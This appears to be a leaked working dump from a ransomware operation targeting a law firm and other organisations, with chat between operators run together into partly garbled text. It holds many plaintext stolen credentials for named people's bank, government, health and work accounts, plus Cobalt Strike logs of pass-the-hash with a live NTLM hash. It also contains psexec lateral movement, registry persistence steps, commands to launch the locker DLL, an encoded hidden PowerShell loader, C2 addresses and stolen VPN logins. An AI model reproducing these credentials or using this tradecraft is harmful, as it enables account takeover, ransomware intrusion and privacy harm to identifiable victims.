--- Chromium Credential (User: bill) ---
URL : https://www.insurancelawsection.org/documents/state-farm-lloyds-v-fuentes-2/
Username : bill.russell@sprouselaw.com
Password : SKk)COlOBuWf

--- Chromium Credential (User: bill) ---
URL : https://www.sandhillslogin.com/account/Signin
Username : bill.russell@sprouselaw.com
Password : Iw$500fc

--- Chromium Credential (User: bill) ---
URL : javascript:;
Username : bluemini
Password : Iw$2020fh

--- Chromium Credential (User: bill) ---
URL : https://login.celebrations.com/login
Username : bill.russell@sprouselaw.com
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.fedex.com/apps/fdmenrollment/
Username : barons26
Password : baron$26

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : ba****26
Password : iw$520fmp

--- Chromium Credential (User: bill) ---
URL :
Username : russell
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://securemail.zionsbancorp.com/securereader/registration.jsf
Username : russell
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://secure.consumerreports.org/ec/inputNewPasswordForm
Username : jbrrussell@suddenlink.net
Password : iw$500fcr

--- Chromium Credential (User: bill) ---
URL : https://www.ancestry.com/checkout/MLI
Username : bill.russell@sprouselaw.com
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://oidc.idp.clogin.att.com/mga/sps/authsvc
Username : jbrrussell@me.com
Password : Iw$500fatt

--- Chromium Credential (User: bill) ---
URL : https://securemail.simmonsfirst.com/securereader/registration.jsf
Username : bill
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : javascript:void(0);
Username : bill.russell@sprouselaw.com
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : javascript:;
Username : russell
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://app.farmlogs.com/
Username : 3615789943
Password : 20202020

--- Chromium Credential (User: bill) ---
URL : https://secure.ssa.gov/RIL/Si.action
Username : JBRRUSSELL
Password : Baron$26

--- Chromium Credential (User: bill) ---
URL : https://www.americanbar.org/auth/login/
Username : bill.russell@sprouselaw.com
Password : Br2020$

--- Chromium Credential (User: bill) ---
URL : https://auth.veteransadvantage.com/signinform
Username : RUS1184105
Password : 202020

--- Chromium Credential (User: bill) ---
URL : https://flightaware.com/account/manage
Username : bill.russell@sprouselaw.com
Password : br202020

--- Chromium Credential (User: bill) ---
URL : https://oidc.idp.clogin.att.com/mga/sps/authsvc
Username : barons26@gmail.com
Password : mallarae32

--- Chromium Credential (User: bill) ---
URL : https://www.wyndhamhotels.com/wyndham-rewards/first-time-sign-in
Username : barons26
Password : baron$26

--- Chromium Credential (User: bill) ---
URL : https://login.fidelity.com/ftgw/Fas/Fidelity/NBPart/CreateUsernamePwd/Create/dj.chf.ra
Username : mallarae32
Password : 32wgrannis

--- Chromium Credential (User: bill) ---
URL : https://nb.fidelity.com/ftgw/Fas/Fidelity/PWI/Login/Response/dj.chf.ra/
Username : mallarae32
Password : 32wgrannis

--- Chromium Credential (User: bill) ---
URL : https://www.eftps.gov/eftps/taiLoginAttempt
Username : 2732058
Password : Tri2020$2020

--- Chromium Credential (User: bill) ---
URL : https://www.alltrails.com/signup
Username : bill.russell@sprouselaw.com
Password : 20202020

````Mitel/192.168.100.235/brussell\SPROUSELAW\bill changeme`@user9 well if you can see the login there - it makes sense to try any other creds with the login of this polzak+Does it start without comma?
remote-exec psexec 192.168.100.103 rundll32 C:\ProgramData\1580759637.bdinstall.dll entryPoint
shell copy 1580759637.bdinstall.dll \\\192.168.100.103\C$\ProgramData\
Look for notes from this username@tl2 found a computer where the admin goes to https://cloud.malwarebytes.com/
but it won't unlock the chrome credentials.
tried with dpapi:chrome and sharpchrome
prints out empty passwords.
--- Chromium Credential (User: douglas) ---
URL : https://tx.countygovernmentrecords.com/texas/web/loginPOST.jsp;jsessionid=3AF15044DA2A27D57AED078F8544455B
Username : douglas.brooking@sprouselaw.com
Password : Sprouse2019

--- Chromium Credential (User: douglas) ---
URL : https://www.texasfile.com/login/
Username : taylor.kelley@sprouselaw.com
Password : Gorebels1856

--- Chromium Credential (User: douglas) ---
URL : https://direct.sos.state.tx.us/acct/acct-login.asp
Username : 10245062
Password : sprouse2017

--- Chromium Credential (User: douglas) ---
URL : https://unitedhealthcaremotion.com/Home/LoginPartial
Username : douglas.brooking@sprouselaw.com
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://www.myuhc.com/member/prewelcome.do
Username :
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://us1.proofpointessentials.com/app/login.php
Username : douglas.brooking@sprouselaw.com
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://pacer.login.uscourts.gov/csologin/login.jsf
Username : Sprouse0124
Password : Ogitj@2020

--- Chromium Credential (User: douglas) ---
URL : https://www.texasbarcle.com/cle/AALookupPassword.asp
Username : doug.brooking@sprouselaw.com
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://www.sos.ok.gov/client/cLoginRegistration.aspx
Username : brooking
Password : Sprouse2019

--- Chromium Credential (User: douglas) ---
URL : https://pcl.uscourts.gov/pcl/index.jsf
Username : Sprouse0124
Password : Ogitj@2020

--- Chromium Credential (User: douglas) ---
URL : http://www.oilgas.org/EmailPassword.aspx
Username : DBrooking05
Password : 24110605

--- Chromium Credential (User: douglas) ---
URL : https://my.voya.com/voyasso/index.html
Username : brookingd
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://www.aa.com/loyalty/login/submit
Username : 83JC1X6
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://www.delta.com/
Username : 9478151385
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://www.united.com/ual/en/us/account/account/login
Username : LW762392
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://www.united.com/ual/en/us/account/account/login
Username : *****392
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://www.aeroplan.com/log_in.do
Username : 750173031
Password : Anastasia0623

--- Chromium Credential (User: douglas) ---
URL : https://www.southwest.com/air/booking/index.html
Username : 629692276
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : javascript:;
Username : Brooking
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://ondemand-relcs-02.fronteo.com/Relativity/Identity/login
Username : doug.brooking@sprouselaw.com
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://www.marriott.com/aries-auth/loginWithCredentials.comp
Username : 660371613
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL :
Username : 1159185041
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://idp.elliemae.com/as/oopXr/resume/as/authorization.ping
Username : dbrooking1020
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://scrcxp.pdhi.com/Portal/Member/4cb6782c-b48d-451e-96be-02d2a7b314a3
Username : dbrooking806
Password : Natwwal1214

--- Chromium Credential (User: douglas) ---
URL : https://accounts.myuhc.com/rt/login/myuhc/en
Username :
Password : Natwwal1214!

--- Chromium Credential (User: douglas) ---
URL : https://texasstateparks.reserveamerica.com/memberSignInSignUp.do
Username : douglas.brooking@sprouselaw.com
Password : Geordi9392!

--- Chromium Credential (User: douglas) ---
URL : https://www.hilton.com/en/auth/login/
Username : 938312336
Password : Natwwal1214!

````Mitel/192.168.100.235/dbrooking\douglas Stasia9323``Mitel/192.168.100.235/msadler\matts Sprouse350``Mitel/192.168.100.235twd/msadler\matts Sprouse350` pay special attention to possible system backup
--- Chromium Credential (User: matts) ---
URL : https://www.att.com/my/
Username : matt.sadler@sprouselaw.com
Password : kalley01

--- Chromium Credential (User: matts) ---
URL : https://cprodmasx.att.com/commonLogin/igate_wam/multiLogin.do
Username : matt.sadler@sprouselaw.com
Password : kalley01

--- Chromium Credential (User: matts) ---
URL : https://oidc.idp.clogin.att.com/mga/sps/authsvc
Username : matt.sadler@sprouselaw.com
Password : kalley01
```
`matts-pc [192.168.100.93]````
beacon> pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:SPROUSELAW.COM /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo 2e8d2fa8e2b > \.\pipe\4fee59" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : aandaservice
domain : SPROUSELAW.COM
program : C:\WINDOWS\system32\cmd.exe /c echo 2e8d2fa8e2b > \.\pipe\4fee59
impers. : no
NTLM : 1737a8ca4966a1b4cf767232b0a4bd58
  | PID 11124
  | TID 8532
  | LSA Process is now R/W
  | LUID 0 ; 1696015470 (00000000:6517246e)
  \_ msv1_0 - data copy @ 00000275420FFA80 : OK !
  \_ kerberos - data copy @ 000002754222D6C8
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 000002754218E768 (32) -> null

beacon> shell copy x64.dll \192.168.100.227\C$\ProgramData\x64.dll
[*] Tasked beacon to run: copy x64.dll \192.168.100.227\C$\ProgramData\x64.dll
[+] host called home, sent: 84 bytes
[+] received output:
The referenced account is currently locked out and may not be logged on to.
        0 file(s) copied.

````pth SPROUSELAW.COM\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58````
beacon> pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:aandaservice /domain:sprouselaw /ntlm:1737a8ca4966a1b4cf767232b0a4bd58 /run:"%COMSPEC% /c echo b7a7be09788 > \.\pipe\cb0f70" command
[+] host called home, sent: 23 bytes
[+] host called home, sent: 438863 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user : aandaservice
domain : sprouselaw
program : C:\WINDOWS\system32\cmd.exe /c echo b7a7be09788 > \\.\pipe\cb0f70
impers. : no
NTLM : 1737a8ca4966a1b4cf767232b0a4bd58
  | PID 9896
  | TID 936
  | LSA Process is now R/W
  | LUID 0 ; 1695752222 (00000000:6513201e)
  \_ msv1_0 - data copy @ 0000027541E22080 : OK !
  \kerberos - data copy @ 0000027541F15C08
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   \_ *Password replace @ 000002754218FAE8 (32) -> null
``````
user : aandaservice
domain : SPROUSELAW.COM
program : C:\windows\system32\cmd.exe /c echo a093d2314f1 > \\.\pipe\cf9cc0
impers. : no
NTLM : 1737a8ca4966a1b4cf767232b0a4bd58
  | PID 19196
  | TID 15936
  | LSA Process is now R/W
  | LUID 0 ; 575605488 (00000000:224f0af0)
  \_ msv1_0 - data copy @ 000001FD13FD6080 : OK !
  \kerberos - data copy @ 000001FD13E24C88
   \_ aes256_hmac -> null
   \_ aes128_hmac -> null
   \_ rc4_hmac_nt OK
   \_ rc4_hmac_old OK
   \_ rc4_md4 OK
   \_ rc4_hmac_nt_exp OK
   \_ rc4_hmac_old_exp OK
   {\_ *Password replace @ 000001FD13F107E8 (32) -> null
``````
pth sprouselaw\aandaservice 1737a8ca4966a1b4cf767232b0a4bd58
```
```
The referenced account is currently locked out and may not be logged on to.

``pth sprouselaw\administrator 59ae5e3ea853a81e1dsfsdfsdfse0e3fafbb052qw68455-721-18c line 19 through 37
с 192.168.100.227
to 192.168.100.89https://ru.malwarebytes.com/business/endpoint-protection/``
192.168.100.100
192.168.100.102
192.168.100.103
192.168.100.105
192.168.100.106
192.168.100.107
192.168.100.108
192.168.100.110
192.168.100.111
192.168.100.114
192.168.100.117
192.168.100.118
192.168.100.120
192.168.100.130
192.168.100.134
192.168.100.135
192.168.100.136
192.168.100.138
192.168.100.139
192.168.100.140
192.168.100.142
192.168.100.143
192.168.100.144
192.168.100.145
192.168.100.147
192.168.100.148
192.168.100.150
192.168.100.152
192.168.100.153
192.168.100.154
192.168.100.155
192.168.100.156
192.168.100.158
192.168.100.160
192.168.100.162
192.168.100.164
192.168.100.165
192.168.100.167
192.168.100.168
192.168.100.170
192.168.100.171
192.168.100.172
192.168.100.175
192.168.100.176
192.168.100.182
192.168.100.187
192.168.100.189
192.168.100.196
192.168.100.198
192.168.100.207
192.168.100.218
192.168.100.222
192.168.100.224
192.168.100.226
192.168.100.227
192.168.100.228
192.168.100.229
192.168.100.230
192.168.100.231
192.168.100.232
192.168.100.233
192.168.100.234
192.168.100.235
192.168.100.236
192.168.100.237
192.168.100.238
192.168.100.243
192.168.100.245
192.168.100.246
192.168.100.247
192.168.100.248
192.168.100.89
192.168.100.93
192.168.100.94
192.168.100.95
192.168.100.96
192.168.100.97
192.168.100.98
192.168.100.99
192.168.111.120
192.168.111.134
192.168.111.135
192.168.111.138
192.168.112.117
192.168.112.144
192.168.112.153
192.168.112.154
192.168.112.156
192.168.112.157
192.168.112.158
``cavona kmd5 both by5183 dustintp c2a23920677e464f359320c23947c237 5125235 aandaservice 1737a8ca496a1b4cf767232b0a4bd58 66048 friends who are out of work or in dead-ends sit - throw your dlkudayLekha shalomUtra in hut, comrades!oday Vovao Semyon helloDay, what grids will be in work?
OPTION added functionality to run the locker, which removes some of the AB detects when dropping it on the disk
Run via regsvr32

regsvr32.exe /s locker.dll - without arguments
regsvr32.exe /s /n /i: "here arguments" - with arguments
``#corp-televisa-com-mx#pcsb-org what do you have in the works at the moment? thanks ``yufdvfte5645warKHAGBSD``380fd7621d03826307b8993ad84c2ecf) waiting for hashes in the root changes everything) ah, well, once pressed do not trust ... on tylufonin not trust, I pressed the hashes, the place clears[ ](https://mediaeveryone.I don't trust tilufonin don't trust me, I clicked it, there are hashes and clears[ ]() com/channel/general?msg=MpgDjanMwbZxXyA6c) to the work pc you hooked a personal iphone? but here's what is it, I have to get dirty again and scour conferences I also have not all left after reinstallingI clean everything immediately after closing the entire computer. I sprinkle holy water.I'm not talking about the last weekdastop, in general, for all the time? I'm talking about all the cases for all time)there in the archive 2 files, 1 - ntlm, 2 - clears40 archives will not download) all ntlm in one archivemake in one file is not necessary divide the groups into the sameoba format will do file only ntlm?
```
c933798f947972ca9d08ba805008d6ca
```
or is this okay?
```
CORP\lkperezcer:::8d3fe083b7e1fcb6f7a069fb8d7a75f5:::
``[ ](https://mediaeveryone.com/channel/general?msg=EQ2NwKzr46SjeK49M) silent. not let me in, cookies are rotten all your ntlm hashes me in the archives collect from their casesmoy have fallen off - I'll try to re-enter them from public resourcesyou task for half an hour maximum - to collect the biggest lists of clean passwords + you have networks at workdobre gancet so on tasks for todaya, everything okIt's strange you two in my networkNo one of them is bazetted anywhere?HiHi:moyai:write to the groups in which you workTax, well, let's see what was done while I was away and in general what is doneHi HiHi:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:moyai:doktat dlls were built with the flag -keep?1-2 pcs where there is vomozozez where you put it?``
beacon> shell reg query HKCU\Environment
[*] Tasked beacon to run: reg query HKCU\Environment
[+] host called home, sent: 57 bytes
[+] received output:

HKEY_CURRENT_USER\Environment
    Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;
    TEMP REG_EXPAND_SZ %USERPROFILE%AppData\Local\Temp
    TMP REG_EXPAND_SZ %USERPROFILE%AppData\Local\Temp
    OneDrive REG_EXPAND_SZ C:{Windows\system32\config\systemprofile\OneDrive
    UserInitMprLogonScript REG_SZ rundll32.exe C:Windows\Temp\STA-NURSEAL-20201020-2033.dll,entryPoint

``````
	- Load this DLL into a writable directory
	- Click on session, persistence - non-elevated - userinitmprlogonscriptkey
	- Type Command : rundll32.exe C:\temp\keep64.dll,entryPoint (MUST specify full path to dll file, MUST rename dll file before loading into something more "organic" depending on files around it)
	- Run
	- Check if the registry entry was created with a shell reg query HKCU\Environment
``1 this is a must and 2 if all goes well tomorrow by 4 and tomorrow definitely closes 1-2 networks put in current networks new and you can go get it http://github.com/0xthirteen/StauKitokili at the end of this month or next month so new ones on receipt immediately check it when? old cobbs then disconnect you from english[ ](https://mediaeveryone.com/channel/general?msg=ZxszvNDaKbZKfk3fL) take it out who doesn`t already have it ``
23.106.160.195
https://topevi.com
-
185.150.190.113:61718
O5xFflqqDG7LDQJUDbdtkkj54zQ8QDVMMI0W
``coba''
74.118.138.108
https://wolfnew.com
-
209.222.98.96:32878
onsOJxzeGz75Nt2p0tGYzjn7oTi5Eo6F644
``Boys write here on VPN https://helpdocpt.club/forums/vpn.11/ like what's what''.
user3
user3 @user3
💬
02:00
Domain
ing server: STAKC-DC2019.STAKC.local:389

tl1
Team Lead 1 @tl1
Admin
02:01
I.e. to create a conf?

user3
user3 @user3
💬
02:01
yes
user 7,4,9,3

``Which I asked you about? Will there be a confab or not? Have you heard anything from them? No, after the closure of the timelines have dropped by a hundred hours I had two, now check the crisp is there?
172.93.109.18:51630
S36rQDbsTVH7D62swcBBexyxGkbNBFalsgx
``give me kobukak too many fuck-ups setoknu if off, then give me then also grid#skytechinc-com from esxi looking for#henrystreet-org creeds from the sphere looking for so what are you doing? hiuser3 stuck in traffic, but so all come? hi:space_invader:all say goodnight do tomorrowto 5okay then for today alla, got them online 5 not, there are only three in the sphere[ ](https://mediaeveryonecom/channel/general?msg=La7JvzhF8okm35g2o) mb to dump? and some creeds are from trastav #corp-televisa-com-mx untwisted and snuck into the servak, got new creeds, tomorrow as someone will be available on the other machine and think the DK will getaustavlja to find kerds from two esxi and everything is ready
found two more nasa with backups, 4 in total
found the kerds from the sphere, there are three esxi, but there are 5 on the network, we need to find 2 more passwords #henrystreet-org scanned the ports and checked all the web mordas, no esxi and sphere, the kerds are in progress. Of at least something worthwhile I found:
```
https://login.symantec.com/sso/idp/SAML2
    it@henrystreet.org
    Hs$54321

https://my.vmware.com/web/vmware/login
    amendez@henrystreet.org
    H$$54321
``Describe what was done for todayTo be filled upRaised the form, set up.And tomorrow by 11Describe the result of today in groupsmaximum we can go by 11All it costs to go 1:30This is a very bad timeWhy so early?tomorrow by 10 to 9Today I'm not long on computers How's it going? scanning subnets from ad_subnets - looking for where I admin read the documentation on psh empireDetail progress on the tasks I've done what Ian just going to deal with youIt turns out that only @user8 free?i'm with the same sessionnu since the foprum then ok raise the foprum me asu.eu? apparently, i personally do not have a task yet finished with vpc just a few minutes ago, on the nets what do you have on the tasks?:space_invader:hellohypoka play with the testing tools please excuse me friends, with sessions while a little stupor, probably a couple of hours to solve mbe earlierwould give new sessions (now I will try to namut, backdoor fell off just
domain where the backdoor was dead all who were alive? goodnight goodnight goodnight no sessions. Will there be any new ones? Good morning:flag_il:Night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night.
https://vpn.floridapoly.edu
```
I'm on a VPN on my hard drive.
Checked the network for ms17\bluekeeper\smbghost (selectively) - all bypassed.
there is still a way to find out dc and check it on the zerologon so we will be late late we will close the network tomorrow by 3 write statuses in groups have tried several versions of ms17
no good. I've scanned the network.
There is one ``.
Host is likely VULNERABLE to MS17-010!
```
but
```
[-] 10.200.101.73:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
``annotify status to groupswho finished rdp only 2 snapshots, write password and what can do snapshot@tl1 add me to @user4 in group pleasewill you restore work dedic, pack all data keepass, but how can I do to 9000 with vpn could hook up?)
like yesterday I'm digging in the dedicke, vpn yesterday's network deployed who do what? it's on the setting rpn do not create new users, change the pass and work with the current one is not enough from 2424? and I already put a new password of at least 30 characters, including letters, numbers and symbols @user4 network is almost dismantled, today it should finish with it. 2 people to help him will be allocated, there is a fairly large network so it is likely that today we will be a long time sessions are expected to check the power settings on the OS to not go to sleep then 10 it will not be a month I'm on the old place 2 people? 3,7,8 dropped the one that is possible to leave the 10 let it be 10lubomne 16 all on the spot write what granddick you want (10,16)
I'll give you access in person
you set up for yourself, install the software and change the password from your account
send me the new password
i give you a snapshot of the current state to be able to roll back to the configured arrow as soon as everythinga although let's not wait another 7 minutes the rest of it yes199.241.189.58 seems alive - i meant your basic that originally gave you stayed 2 already took away that temporary gave you which already have, it can keep? 3 vin 10 and 3 vin 16 rdp come up yet? hello all hello:space_invader:good weekend on nn by 1 o'clockfiles deletedsessions in slipstream well worth a try * it is quite worth trying msf try? different loads, ports
i ask if anything, do not waste time)@user3 already a few days it bangs it sits next to you therea information as i understand by tpsh no?:#sisd-net let's leave for another day today until 12:skull:so it is already dead)there stall should be up to 40 seconds11 minutes pingingnyayaat something like ACADEMIC.NET should not be seen there your in tpsh came to user3 and what to do with it next?i can't see how to do anything else with it!) how to spam it from usera (i'll try it in ptsh ghbktntkf jn .pthf 9 and no other variants? it's probably portne, it does not bitemakafitam still try what av? there are a couple more rpn:disappointed:no there are no avs did not start it, try different cobalt load options - session does not come
there are any other options to get the session? or AV cuts the connection as an option - there is a whitelist for IP on the TCP connection pinged but the process hangs and no session in general summing up not the fact that there is no output traffic on the 443 portd)
I have not checked...copied from the Russian-language resource? Yes and I see there ?????? 443 ?????????????dir=INlocalport 443 action=allow dir=IN you use a rule for the firewall and for that matter if it is not there, then the software on your machine does not have a software that keeps 443 open-most likely there would be a web server if the netstat was 443 port local open 139 445 and so e shows just open ports more role flag-anetstat -nikak, assumed
the netstat does not have it how did you determine that 443 is closed? daleenet) the question about the busy port is relevant? in other words, the current machine through 57431 port makes a request to 172....195:443 on the right remote + port as you see on the left is the local address and port is the netstat hat` ``

Active Connections

  Proto Local Address Foreign Address State
``that is, the port is busy with your coba? `s external[ ](https://mediaeveryone.com/channel/general?msg=B2vsb4MHfdZiYoRMP) ip 172. what is it? read[ ](https://mediaeveryone.com/channel/general?msg=AHk7aiQJYEZN9R4Tw) read the last 30 messages, well, we need to change the port or redirect
the session on 443 by idea should not come to me on what? all responded? on cmb link445 on cmb, it turns out, too i have not tried, but i think on the 80th you can raise the session on me on i zumeroka you do not smoke? ok i will wait all kureyatsko rather no than yes they are long?i'm in my office and i see that they're not there i have all "online" status some are away for now@user8 is responsible for all? won't come[ ](https://mediaeveryone.com/channel/general?msg=6Pib9yhKR6fKGMYDj) this[ ](https://mediaeveryone.com/channel/general?msg=vkaZGMZbNa7du9uhB) or this[ ](https://mediaeveryone.com/channel/general?msg=rEMML3ycEFazRDrxT) this one which one?
 Can you tell me please - if the 443 port is closed, the session will not come to the coba?
```
+ question to all above we have two people in the team) not we have https domains and the port is 443
so it's more a question of what to do with it if the port is closed)what? @all you a questionPlease tell me - if the 443 port is closed, the session will not come to the cob?
https://lab.devry.edu/vpn/index.html D41111543 Carolann#05302009
https://lab.devry.edu/vpn/index.html d40016842 Jackson3
https://lab.devry.edu/vpn/index.html d01677853 Lilly535
https://lab.devry.edu/vpn/index.html d01480444 aDv!9659
```
@user9 do you have 2 more nets to work with?
https://vpn.floridapoly.edu
```
I'm scouring the sabnets in search of dk - check on zerologontak, who's doing what write to the groupsnetIn ptsh you can shove exeshniks into memory as in the cob? I still have problems with dedik - no++? everyone has work * yeahAll come?helloGood day to all:space_invader:okk 12 suggest an early and early endTomorrow by what time? See you all tomorrow thank you and go home in slipstreams behind you remove the files.net removed AD. LA no. Looking for where the current polzak admin in the subnets from the sysbetstsuspasiblE I have nothing, try the other loads and work through ps` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx` in `https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773` yt pfgecnbnm cmd and ps`sharecare.com` - error when logging into citrix
`mch1.org` - no access at all anywhere except medical app, where login and password cannot be entered
`protransport.cloud.com` - only have access to the freight application, the login details do not fit
``unf.edu `` - now in operation, taken off adinfo, DA, DK, kerbs transferred tl2, taken off the ball list, now network walkthrough and take down mimic+hashdampane gives you access from the ip dedic
```
https://login.medimizer.net/rdweb/pages/en-us/login.aspx
```
Citrix doesn't lead anywhere except for admin sites, there is a VPN tunnel on the gateway but no one can see any computers on the net
```
https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml
```
in work - about the progress wrote in the confr
not much progress in words, not enough PCs
at the moment it is /16 on 445
```
https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com
I can't get anything to work, closed by the admin cmd admins please write about which domain it's about and what's wrong or so i don't understand how i can try eleveit kite via that tool, tomorrow i will try to do it via deadic
https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773
What was wrong with the first one? @user3 I have 2 accesses written down on youI have nothing, I'll try the other loads and work through pswhat went wrong or did it work and what progressSISDNET - continue to `scan subnets from sabnets - looking for where the admin polzak ` straight on all their current accesses that bralitak well I would still first remove the hell, kerb, sharpfinder. the current tour allows if the AV is not too biting8443 port still wanted to write about it) rev_tcp_rc4 very good from msfCheck different ports
rev_http
rev_https
80/443/53I would have played with listener and portsada i think here check in kobu and in armagate 2 loads and you can understand that not pull)not once rolled sessions in armagate info unloadnado had to work under current conditions, remove kerb etc if not allowed a clean dll then traffic blocks it there is not a loadTried to run different loads. did not work till 11 work, at 11, the total for 10 minutes and go home at 11, wrap it upwrite in groups that done pishite in conffor where the problem[ ](https://mediaeveryone.com/channel/general?msg=GBuGjFSkRq2fukyFx) in general with my session is sad
i run a tool - it works and session flies away on others not i ran - says that on the machine where i have access to admin spheres but he does not have rights why did you run toshairfinder? check if polzak has admin rights to other machines ? i have no progress with mgrmedu.com
polzak can't get it up.
I'm surfing the net.
+ sessions keep dropping - avrubit checked with scanner ms17 the only alive server 2008 - dead
took the kerbs off the trusts and gave them to tl2
i'm thinking what to raise i'm trying to get the system what results do you have? it's dirtier than the ground)yeahlfcobes? load what? i'm running `https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj colorblue76!` in cmd/ps load ``powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWAA2ADMATwBpAFMAaABiAC8ASABQADgASwBQAHEAUgBLAHEAVABFAHUAUgB1AFAARQAyAFUAcgBWAGcARAB4AEUAZwBTAGcAUABYADcAbQBwAFYAQQB1AHQAUQBYAGsASgBqAFkAaAAzADUAbgArAC8AQgA5AFQAYwB6AEUANQBtAGQANgBwADIAMQB5AHIASwA3AHUAWQA4AGYAKwBmAFIAQgB3AE8AVABHADQAUABFAHIAawAzAFUAMABNAEgAVQB6AFEAVABIAGkAUgBzAEcAMQBHADIAbABjAHMAMgBIAE0AcQBFAGUAcQBLAC8AVgB5AGkAbwBOAGIARgBJAGMARgA0AHUAWABOAFMAWQB2AFUAUgB6AGEATAA4AGgAeABZAHAAdwBrADEASgArAFYAcQB4AEcASwBrAFUALwBWAHIAdgBjAG8AZgB2AEYARABKAC8AVgB3AG4AUwBvADMAQgBTAEYAMgAwAGgAagBUAFYAMQBlAFYAcQAvAEkAbwBEAFIASwAwAHcAaQA4AEIASQB1ADQAZQB2AC8AaQBZAHYASQBaAE8AQQBvAHAAcQBUADIAdwBVADgAYQBHAFAAMwBPAEQANQB5ADUAZABlAEcAcwBjADQASQBLAGQAOQBRADgASwBFAFQAUgBMAHMATAB6ADAAWABKAHoAVwBhACsAawBaAE4AWAAzAEcATQBiAHgANgBYAEcAMgB3AFQANgBrAC8AcQArAHEAVQBoAGUAZQBFAFMAZQBXAGUAeQB2AEkAZgBzAFYAMwBDAEkARABaAHoAaQBuAFIATABhAHEAUABDAGcA


``The process is created, but the session does not come amsi bypass script blocks as malwarekak malware script[ ](https://mediaeveryone.com/channel/general?msg=CdzqBnJxqPN8YbhkA) I tried it, it blocks avi still, I repeat I don't know how many times, remove your tules and any of your files from the system, remove the kerberostom if rubeus blockutpoyadalashev further it depends on you how you will raise them) you have the whole githab) ability to work with cmd, download files and so on, but how to raise privileges through this tool?if there's no file, there's no kerbs either, right? when you remove the kerbs, send it to @tl2 and duplicate it in the conf@user7 in the conf@user9 conf, please@user9 made the conf thank you@user4 duplicate it in the conf[ ](https://mediaeveryone.com/channel/general?msg=bHAEAFsYYCqokD8Bf) mgrmedu.com me, I threw tl2 can chat, you can pour rubyuskstatino no one else? no one else took kerbs? take one just for yourself you have 4 dedicates` ``
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj colorblue76!
``This one here requires an old sitrickets weight, I download it and when I install it it says to me like: It's not really a new version? Put the newest. If I tear down the new one that is standing the guys can not use the shellcode in the privateIn @tl1 there is a shellcode builder so it starts like this ``.
rundll32.exe C:\path\to\file\file.dll,entryPoint
regsvr32.exe /s C:\path\to\file\file.dll
``this is the FUD``.
./shellConcatination --source=shellStarter_llvm_x64.dll --target=x64.dll --addBin=x64.bin -self -keep

``````
Doing a cryptor raw to exe session does not come.
```
It opened...I had a message that the site does not support tls 2.0 or change the default gateway to another one just to check if it is available. Reset it completelyfresh? What browser do you use? Does it show the page? It's ok. The session is not coming from the default gateway. https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx is just a white screen, so no valid CREDES?
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!
``There's no connection here?
phoen1xasp.com
``````
 https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773

